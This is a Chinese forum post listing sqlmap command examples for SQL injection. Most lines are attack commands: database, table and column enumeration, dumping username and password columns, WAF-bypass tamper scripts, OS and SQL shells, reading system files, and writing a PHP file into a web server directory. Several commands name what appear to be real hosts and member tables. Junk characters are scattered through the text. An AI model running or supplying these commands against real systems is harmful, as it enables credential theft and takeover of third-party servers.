找回密码
 立即注册
查看: 3264|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap3 r& }) D) H* j7 l; j5 f$ d
6 Y6 S- v3 w) M' Q- I4 u  L
update :::::>     in the folder   after  execute    following   order : svn update
0 p, C2 K% d1 ?' [# Q' f) x, \; x( Q$ d% B* V1 I( I1 j0 z
sqlmap.py -r 1.txt --current-db
  E! a; r# g7 L3 ?) ~& q+ u# e
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”$ l3 Z& b; i5 G

# C. k3 E9 }) t" p3 m( {% I* m==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 5 }" e2 r" h& k, r7 r; v& Y9 R" s8 A6 R' ]
猜解数据库3 f! w% h6 y) `1 R# `4 `
./sqlmap.py -u "injection-url" --dbs
! m/ ~! c8 L8 Q1 t' tsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
6 W. ^" r/ H$ ~7 L) j$ {* T' f0 \6 ?5 d. \' M
猜解表名9 N' c! K/ j7 [
./sqlmap.py -u "injection-url" -D database_name --tables9 H8 j/ D$ r' q$ n
: N% N9 k, d  X$ }
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"* ?+ ]# ^1 b8 g. v
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
% Q" u% b3 O! S/ M* F% P
5 s. ]4 s" C% c& F$ |' r8 _, Gsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump. H" m# Q8 {; j* k; U0 G
' N# ]9 O- M% m3 u& p
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
0 a/ o/ g9 r, T5 asqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
) N$ ]% q+ u, I7 h- H, o5 ]2 Bsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 5 `; `6 [; ]2 u+ F* m/ C$ t
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
" Z- q5 R' H( z$ s" L& m! C; ~; l# |- V3 ?  |: k* E" Z7 l. t8 g* j5 Y
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"5 ~: A3 a" H+ d$ h/ O6 b0 t
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
9 ^/ [7 t/ M/ O5 D, K" F$ {" d1 c& Ssqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"8 F4 G0 S7 c2 |% r
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"8 @% @! R/ }& m6 m
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
1 E& d! b$ H' o6 K4 Q1 U
& W# ?2 u' |2 G7 esqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
) H7 x# H- Y  x0 v& ?/ asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"$ s8 @+ c: k7 z+ }2 J, F4 N

( {2 j- _4 a4 m. p  o5 k$ X# asqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
8 P5 b/ E$ i4 m& k+ w! S$ k  H0 M猜解列名
! n. o& f% T  d3 \./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
1 p6 E2 d6 `% g5 U, s
! Q6 Y/ R4 j0 x) @, D# usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
* R$ J4 M+ q7 P% v" ]2 N. Qsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
! g% C1 I! q5 l' U8 S$ [0 Xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"! k8 a* U  }+ p/ x7 J; T
, m0 A- F* Z! {
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
/ _  L7 e  b& u! N2 ?&submit=Go! ?3 `& s0 G) z$ R- r! K& c0 E
猜解值
, k8 |& r" G; k: y$ |% y./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump' L* ~2 J1 v5 V% j) J9 q: L  S) N
========================================================
- G+ L8 R0 d, w6 }) k- A搜索表名中包括mana字符的
8 W% b! L  ~9 M+ c* e& J' d/sqlmap.py -u "injection-url" -T mana --search
# l! Z' y) s8 ?# O返回一个交互式sql shell+ b! N0 F' A' u+ O* [1 ?" H
/sqlmap.py -u "injection-url" --sql-shell
( Q6 e( Q" }1 s7 }* k读取指定文件(需权限)
) i  U% q; {  I& p1 {! L- E  f/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"( U9 ^6 L* L6 N0 b# i
查看当前 用户 及 数据库
2 g. b! B7 w0 f' m/sqlmap.py -u "injection-url" --current-user --current-db' l8 W9 u( {2 J( \0 ]9 Q
本地文件 写入 远程目标绝对路径
5 c0 G0 F) c7 Y  @: ]/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径  E: \* O2 Z. }$ N' _! q
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
8 p+ Q2 g# R8 v. Z5 {
% i$ Z; C( @4 u0 ]3 |9 \sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径9 f6 U4 k6 S1 @  m5 \
查看某用的权限
) ]+ S) a% T3 J/sqlmap.py -u "injection-url" --privileges -U root; y1 N8 O( |% T' C  |# @6 C
查看当前用户是否为dba( Z- b) e8 b( d! X+ k( n
/sqlmap.py -u "injection-url" --is-dba
' r4 Q" ]# H5 g+ O+ X- ?4 L* S7 [6 {读取所有数据库用户或指定数据库用户的密码
7 d8 N+ T; Q& H  b# r; {5 Q' o. Tsqlmap.py -r 1.txt --users --passwords$ c; T* P2 ]7 M, c0 b/ @& @
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
& f, A% }2 i; f4 V6 j' d  ?/ ?  u6 A( P$ v
/sqlmap.py -u "injection-url" --passwords -U root
* o1 D( ~5 K1 P4 J0 b$ X  x$ B0 h- c1 w7 _3 n
--start&&--stop 与 --first&&--last 的区别& Z- B) T+ O$ ^9 z, }! [# D* e
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)/ ~; U. |  }1 B% ]

) x; ]( Y  o+ V从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
) w5 k- t) q4 O% H" J( o# G& }/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables; v3 B! U( x7 C9 l1 G. O
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns) C8 f' o" z; `9 I
& e7 W1 \3 \+ c2 C' k1 D
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
4 j2 N& ]6 ~% q- O* E' e% e/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
7 v$ \3 S1 [" G7 n7 t% H5 |6 P* l1 A% {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表